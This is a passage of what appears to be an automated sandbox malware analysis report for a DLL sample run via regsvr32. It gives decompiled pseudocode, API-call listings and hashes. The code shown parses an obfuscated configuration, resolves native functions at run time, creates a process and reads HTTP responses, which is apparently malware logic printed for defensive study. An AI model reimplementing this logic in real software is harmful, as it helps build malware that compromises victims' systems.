                    					L69:
                    					return _v12;
                    				}
                    				_t39 =  *0x4f9a31c; // 0x69b25f44
                    				_push(_t115);
                    				if(E04F94451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                    					L67:
                    					HeapFree( *0x4f9a2d8, 0, _v16);
                    					goto L69;
                    				} else {
                    					_push(_t101);
                    					_t102 = _v12;
                    					if(_t102 == 0) {
                    						_t45 = 0;
                    					} else {
                    						_t98 =  *0x4f9a31c; // 0x69b25f44
                    						_t45 = E04F9572F(_t104, _t102, _t98 ^ 0x7895433b);
                    					}
                    					_push(_t118);
                    					if(_t45 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                    							 *0x4f9a2e0 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t46 = 0;
                    					} else {
                    						_t94 =  *0x4f9a31c; // 0x69b25f44
                    						_t46 = E04F9572F(_t104, _t102, _t94 ^ 0x219b08c7);
                    					}
                    					if(_t46 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                    							 *0x4f9a2e4 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t47 = 0;
                    					} else {
                    						_t90 =  *0x4f9a31c; // 0x69b25f44
                    						_t47 = E04F9572F(_t104, _t102, _t90 ^ 0x31fc0661);
                    					}
                    					if(_t47 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                    							 *0x4f9a2e8 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t48 = 0;
                    					} else {
                    						_t86 =  *0x4f9a31c; // 0x69b25f44
                    						_t48 = E04F9572F(_t104, _t102, _t86 ^ 0x0cd926ce);
                    					}
                    					if(_t48 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                    							 *0x4f9a004 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t49 = 0;
                    					} else {
                    						_t82 =  *0x4f9a31c; // 0x69b25f44
                    						_t49 = E04F9572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                    					}
                    					if(_t49 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                    							 *0x4f9a02c = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t50 = 0;
                    					} else {
                    						_t78 =  *0x4f9a31c; // 0x69b25f44
                    						_t50 = E04F9572F(_t104, _t102, _t78 ^ 0x2878b929);
                    					}
                    					if(_t50 == 0) {
                    						L41:
                    						 *0x4f9a2ec = 5;
                    						goto L42;
                    					} else {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                    							goto L41;
                    						} else {
                    							L42:
                    							if(_t102 == 0) {
                    								_t51 = 0;
                    							} else {
                    								_t75 =  *0x4f9a31c; // 0x69b25f44
                    								_t51 = E04F9572F(_t104, _t102, _t75 ^ 0x261a367a);
                    							}
                    							if(_t51 != 0) {
                    								_push(_t51);
                    								_t72 = 0x10;
                    								_t73 = E04F91760(_t72);
                    								if(_t73 != 0) {
                    									_push(_t73);
                    									E04F94DFF();
                    								}
                    							}
                    							if(_t102 == 0) {
                    								_t52 = 0;
                    							} else {
                    								_t70 =  *0x4f9a31c; // 0x69b25f44
                    								_t52 = E04F9572F(_t104, _t102, _t70 ^ 0xb9d404b2);
                    							}
                    							if(_t52 != 0 && E04F91760(0, _t52) != 0) {
                    								_t121 =  *0x4f9a3cc; // 0x5ac95b0
                    								E04F91000(_t121 + 4, _t68);
                    							}
                    							if(_t102 == 0) {
                    								_t53 = 0;
                    							} else {
                    								_t65 =  *0x4f9a31c; // 0x69b25f44
                    								_t53 = E04F9572F(_t104, _t102, _t65 ^ 0x3df17130);
                    							}
                    							if(_t53 == 0) {
                    								L59:
                    								_t54 =  *0x4f9a320; // 0xb2d5a8
                    								_t22 = _t54 + 0x4f9b252; // 0x616d692f
                    								 *0x4f9a370 = _t22;
                    								goto L60;
                    							} else {
                    								_t64 = E04F91760(0, _t53);
                    								 *0x4f9a370 = _t64;
                    								if(_t64 != 0) {
                    									L60:
                    									if(_t102 == 0) {
                    										_t56 = 0;
                    									} else {
                    										_t61 =  *0x4f9a31c; // 0x69b25f44
                    										_t56 = E04F9572F(_t104, _t102, _t61 ^ 0xd2079859);
                    									}
                    									if(_t56 == 0) {
                    										_t57 =  *0x4f9a320; // 0xb2d5a8
                    										_t23 = _t57 + 0x4f9b791; // 0x6976612e
                    										_t58 = _t23;
                    									} else {
                    										_t58 = E04F91760(0, _t56);
                    									}
                    									 *0x4f9a3e0 = _t58;
                    									HeapFree( *0x4f9a2d8, 0, _t102);
                    									_v12 = 0;
                    									goto L67;
                    								}
                    								goto L59;
                    							}
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F9502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F95060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F95092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04F95191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04F951A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 531289f9fee70c1b004c71ebf374d1296e865d1758c5fedf321efc2b895d126c
                    • Instruction ID: b154f43cdc42e84fd891e21dd4ceca8e3fd4570493af82b9eb9f204578ca63aa
                    • Opcode Fuzzy Hash: 531289f9fee70c1b004c71ebf374d1296e865d1758c5fedf321efc2b895d126c
                    • Instruction Fuzzy Hash: 01818072F0024ABBFF22DFB4AC84D5B77E9EB487447245925A401D7204EA3AFD478B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                    • Instruction ID: ca7700acd34ee5d80a3c1f80e74a5181d3dff78c34db2fe56ed49bf25cc0a9ad
                    • Opcode Fuzzy Hash: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                    • Instruction Fuzzy Hash: DE611A35900119DFEF24DF50DE84AAAB7B9FF84328F1981D6D8096B215D330AE95CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                    • Instruction ID: c8b92ef96ac1f8c6e3e20e2608a2bd8ee5d38a8134a65d6435dd9bd4230803d8
                    • Opcode Fuzzy Hash: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                    • Instruction Fuzzy Hash: 1E412C3590011ADFEF14DF44DE84AA9B7B9FF44324F1991D6D8086B216D331AE85DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                    • Instruction ID: db8d7b56a727def380f97b8d8d496f049eab0a45fa3f7645a5f64449306a4cea
                    • Opcode Fuzzy Hash: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                    • Instruction Fuzzy Hash: AE41257690021ADFEF20DF44CA84BA9B7B9FB48324F1985D6D9096B216D330EE85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                    • Instruction ID: f96c34bb69797eb0c7778676b7feb73908d12c1269af1aa959cde46d1b2c94a8
                    • Opcode Fuzzy Hash: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                    • Instruction Fuzzy Hash: C5311376A00215DFEF24DF54CE84BA9B7B9FF88724F198599D9096B316D330A980CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                    • Instruction ID: 0f4ee62f955b4071e79a9804bac63eef47a835922e3fdf7c3f81b46e1ca4b312
                    • Opcode Fuzzy Hash: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                    • Instruction Fuzzy Hash: FC21F53690011ADFEF20DF04CA84BA9B7B9FB48324F1995D6C9096B316D330EA85CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E04F9196A(void* __eax, void* __ecx) {
                    				long _v8;
                    				char _v12;
                    				void* _v16;
                    				void* _v28;
                    				long _v32;
                    				void _v104;
                    				char _v108;
                    				long _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t47;
                    				intOrPtr _t50;
                    				void* _t58;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t71;
                    
                    				_t1 = __eax + 0x14; // 0x74183966
                    				_t69 =  *_t1;
                    				_t36 = E04F9624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                    				_v8 = _t36;
                    				if(_t36 != 0) {
                    					L12:
                    					return _v8;
                    				}
                    				E04F97961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                    				_t40 = _v12(_v12);
                    				_v8 = _t40;
                    				if(_t40 == 0 && ( *0x4f9a300 & 0x00000001) != 0) {
                    					_v32 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v108 = 0;
                    					memset( &_v104, 0, 0x40);
                    					_t47 =  *0x4f9a320; // 0xb2d5a8
                    					_t18 = _t47 + 0x4f9b3e6; // 0x73797325
                    					_t68 = E04F91E10(_t18);
                    					if(_t68 == 0) {
                    						_v8 = 8;
                    					} else {
                    						_t50 =  *0x4f9a320; // 0xb2d5a8
                    						_t19 = _t50 + 0x4f9b747; // 0x5ac8cef
                    						_t20 = _t50 + 0x4f9b0af; // 0x4e52454b
                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                    						if(_t71 == 0) {
                    							_v8 = 0x7f;
                    						} else {
                    							_v108 = 0x44;
                    							E04F96381();
                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                    							_push(1);
                    							E04F96381();
                    							if(_t58 == 0) {
                    								_v8 = GetLastError();
                    							} else {
                    								CloseHandle(_v28);
                    								CloseHandle(_v32);
                    							}
                    						}
                    						HeapFree( *0x4f9a2d8, 0, _t68);
                    					}
                    				}
                    				_t70 = _v16;
                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                    				E04F917AB(_t70);
                    				goto L12;
                    			}

                    APIs
                      • Part of subcall function 04F9624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F91986,?,?,?,?,00000000,00000000), ref: 04F96274
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F96296
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F962AC
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F962C2
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F962D8
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F962EE
                    • memset.NTDLL ref: 04F919D4
                      • Part of subcall function 04F91E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04F919ED,73797325), ref: 04F91E21
                      • Part of subcall function 04F91E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F91E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,05AC8CEF,73797325), ref: 04F91A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04F91A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F91A79
                      • Part of subcall function 04F96381: GetProcAddress.KERNEL32(36776F57,04F9793C), ref: 04F9639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04F91A56
                    • CloseHandle.KERNEL32(?), ref: 04F91A5B
                    • GetLastError.KERNEL32(00000001), ref: 04F91A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 098eabd5c9fd0906f0e71c43b6aca4420a9b3687389998a116f90b4901256df5
                    • Instruction ID: 2e3692f5c06fb8f48511fb0cf5107f44dcea6022ce0f12c942e8ff2d2bff5e93
                    • Opcode Fuzzy Hash: 098eabd5c9fd0906f0e71c43b6aca4420a9b3687389998a116f90b4901256df5
                    • Instruction Fuzzy Hash: 9A313DB6D00219BFFF10AFA4DD88D9EBBF8EB08344F004569E506E7110DB75AE468B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E04F9266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t58;
                    				signed int _t60;
                    				signed int _t62;
                    				intOrPtr _t64;
                    				intOrPtr _t66;
                    				intOrPtr _t70;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    				intOrPtr _t80;
                    				WCHAR* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				intOrPtr _t92;
                    				intOrPtr* _t102;
                    				signed int _t103;
                    				void* _t104;
                    				intOrPtr _t105;
                    				void* _t107;
                    				intOrPtr* _t115;
                    				void* _t119;
                    				intOrPtr _t125;
                    
                    				_t58 =  *0x4f9a3dc; // 0x5ac9c00
                    				_v24 = _t58;
                    				_v28 = 8;
                    				_v20 = GetTickCount();
                    				_t60 = E04F92E72();
                    				_t103 = 5;
                    				_t98 = _t60 % _t103 + 6;
                    				_t62 = E04F92E72();
                    				_t117 = _t62 % _t103 + 6;
                    				_v32 = _t62 % _t103 + 6;
                    				_t64 = E04F92F7B(_t60 % _t103 + 6);
                    				_v16 = _t64;
                    				if(_t64 != 0) {
                    					_t66 = E04F92F7B(_t117);
                    					_v12 = _t66;
                    					if(_t66 != 0) {
                    						_push(5);
                    						_t104 = 0xa;
                    						_t119 = E04F91289(_t104,  &_v20);
                    						if(_t119 == 0) {
                    							_t119 = 0x4f9918c;
                    						}
                    						_t70 = E04F91DDD(_v24);
                    						_v8 = _t70;
                    						if(_t70 != 0) {
                    							_t115 = __imp__;
                    							_t72 =  *_t115(_t119);
                    							_t75 =  *_t115(_v8);
                    							_t76 =  *_t115(_a4);
                    							_t80 = E04F963FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                    							_v24 = _t80;
                    							if(_t80 != 0) {
                    								_t105 =  *0x4f9a320; // 0xb2d5a8
                    								_t102 =  *0x4f9a134; // 0x4f97ca9
                    								_t28 = _t105 + 0x4f9bb08; // 0x530025
                    								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                    								_push(4);
                    								_t107 = 5;
                    								_t83 = E04F91289(_t107,  &_v20);
                    								_a8 = _t83;
                    								if(_t83 == 0) {
                    									_a8 = 0x4f99190;
                    								}
                    								_t84 =  *_t115(_a8);
                    								_t85 =  *_t115(_v8);
                    								_t86 =  *_t115(_a4);
                    								_t125 = E04F963FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                    								if(_t125 == 0) {
                    									E04F917AB(_v24);
                    								} else {
                    									_t92 =  *0x4f9a320; // 0xb2d5a8
                    									_t44 = _t92 + 0x4f9bc80; // 0x73006d
                    									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                    									 *_a16 = _v24;
                    									_v28 = _v28 & 0x00000000;
                    									 *_a20 = _t125;
                    								}
                    							}
                    							E04F917AB(_v8);
                    						}
                    						E04F917AB(_v12);
                    					}
                    					E04F917AB(_v16);
                    				}
                    				return _v28;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F92682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04F92703
                    • lstrlen.KERNEL32(?), ref: 04F92714
                    • lstrlen.KERNEL32(00000000), ref: 04F9271B
                    • lstrlenW.KERNEL32(80000002), ref: 04F92722
                    • lstrlen.KERNEL32(?,00000004), ref: 04F9278B
                    • lstrlen.KERNEL32(?), ref: 04F92794
                    • lstrlen.KERNEL32(?), ref: 04F9279B
                    • lstrlenW.KERNEL32(?), ref: 04F927A2
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: 75c912fb675af163e1cca7d0805858072e520239578911d51b2f3ea0dbbc018a
                    • Instruction ID: 53cf4fe71ab66e5ad3470f5f442923824862e6cfbe99d468a9a8ef6d02ee5b13
                    • Opcode Fuzzy Hash: 75c912fb675af163e1cca7d0805858072e520239578911d51b2f3ea0dbbc018a
                    • Instruction Fuzzy Hash: 9D518D72D0021ABBEF11AFA5DC44EDE7BF5EF44314F064465E904A7260DB35AE12DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F958EE(void* __ecx, void* __esi) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				long _v20;
                    				long _t34;
                    				long _t39;
                    				long _t42;
                    				long _t56;
                    				void* _t58;
                    				void* _t59;
                    				void* _t61;
                    
                    				_t61 = __esi;
                    				_t59 = __ecx;
                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                    				do {
                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                    					_v20 = _t34;
                    					if(_t34 != 0) {
                    						L3:
                    						_v8 = 4;
                    						_v16 = 0;
                    						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                    							_t39 = GetLastError();
                    							_v12 = _t39;
                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                    								L15:
                    								return _v12;
                    							} else {
                    								goto L11;
                    							}
                    						}
                    						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                    							goto L11;
                    						} else {
                    							_v16 = 0;
                    							_v8 = 0;
                    							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                    							_t58 = E04F963FD(_v8 + 1);
                    							if(_t58 == 0) {
                    								_v12 = 8;
                    							} else {
                    								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                    									E04F917AB(_t58);
                    									_v12 = GetLastError();
                    								} else {
                    									 *((char*)(_t58 + _v8)) = 0;
                    									 *(_t61 + 0xc) = _t58;
                    								}
                    							}
                    							goto L15;
                    						}
                    					}
                    					SetEvent( *(_t61 + 0x1c));
                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                    					_v12 = _t56;
                    					if(_t56 != 0) {
                    						goto L15;
                    					}
                    					goto L3;
                    					L11:
                    					_t42 = E04F95867( *(_t61 + 0x1c), _t59, 0xea60);
                    					_v12 = _t42;
                    				} while (_t42 == 0);
                    				goto L15;
                    			}

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04F95905
                    • SetEvent.KERNEL32(?), ref: 04F95915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04F95947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9598C
                    • GetLastError.KERNEL32 ref: 04F9599E
                      • Part of subcall function 04F95867: WaitForMultipleObjects.KERNEL32(00000002,04F97AF8,00000000,04F97AF8,?,?,?,04F97AF8,0000EA60), ref: 04F95882
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • GetLastError.KERNEL32(00000000), ref: 04F959D3
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 4809fef1a9b0a03e8dd0fb0d3d568156c360a46d2640ebd14fe4e686f66fef0f
                    • Instruction ID: 0af29003c7d9b76d2454274978fd0c047cf43dbc516400dddc7d8d28cc654d13
                    • Opcode Fuzzy Hash: 4809fef1a9b0a03e8dd0fb0d3d568156c360a46d2640ebd14fe4e686f66fef0f
                    • Instruction Fuzzy Hash: 7431F9B6D00209BFFF22DFA5C88099EB7F8EB08354F10556EE551A2250D771AE499B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04F94D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04F94D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04F94D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94DA7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: fc13b2c7c41aa6c65b19cdbd322b08421b488df259955e17b5c69368879e4e82
                    • Instruction ID: 6e9caf46678625e64ca092efb511ddb9c7eb32e353b4141c5066210119b8c16b
                    • Opcode Fuzzy Hash: fc13b2c7c41aa6c65b19cdbd322b08421b488df259955e17b5c69368879e4e82
                    • Instruction Fuzzy Hash: 33313D36D00609BFEF01DFB8D844A9EB7F6AF49304F154465E910EB220DB75AD06CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F9624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				intOrPtr _v8;
                    				intOrPtr _t23;
                    				intOrPtr _t26;
                    				_Unknown_base(*)()* _t28;
                    				intOrPtr _t30;
                    				_Unknown_base(*)()* _t32;
                    				intOrPtr _t33;
                    				_Unknown_base(*)()* _t35;
                    				intOrPtr _t36;
                    				_Unknown_base(*)()* _t38;
                    				intOrPtr _t39;
                    				_Unknown_base(*)()* _t41;
                    				intOrPtr _t44;
                    				struct HINSTANCE__* _t48;
                    				intOrPtr _t54;
                    
                    				_t54 = E04F963FD(0x20);
                    				if(_t54 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t23 =  *0x4f9a320; // 0xb2d5a8
                    					_t1 = _t23 + 0x4f9b11a; // 0x4c44544e
                    					_t48 = GetModuleHandleA(_t1);
                    					_t26 =  *0x4f9a320; // 0xb2d5a8
                    					_t2 = _t26 + 0x4f9b769; // 0x7243775a
                    					_v8 = 0x7f;
                    					_t28 = GetProcAddress(_t48, _t2);
                    					 *(_t54 + 0xc) = _t28;
                    					if(_t28 == 0) {
                    						L8:
                    						E04F917AB(_t54);
                    					} else {
                    						_t30 =  *0x4f9a320; // 0xb2d5a8
                    						_t5 = _t30 + 0x4f9b756; // 0x614d775a
                    						_t32 = GetProcAddress(_t48, _t5);
                    						 *(_t54 + 0x10) = _t32;
                    						if(_t32 == 0) {
                    							goto L8;
                    						} else {
                    							_t33 =  *0x4f9a320; // 0xb2d5a8
                    							_t7 = _t33 + 0x4f9b40b; // 0x6e55775a
                    							_t35 = GetProcAddress(_t48, _t7);
                    							 *(_t54 + 0x14) = _t35;
                    							if(_t35 == 0) {
                    								goto L8;
                    							} else {
                    								_t36 =  *0x4f9a320; // 0xb2d5a8
                    								_t9 = _t36 + 0x4f9b4d2; // 0x4e6c7452
                    								_t38 = GetProcAddress(_t48, _t9);
                    								 *(_t54 + 0x18) = _t38;
                    								if(_t38 == 0) {
                    									goto L8;
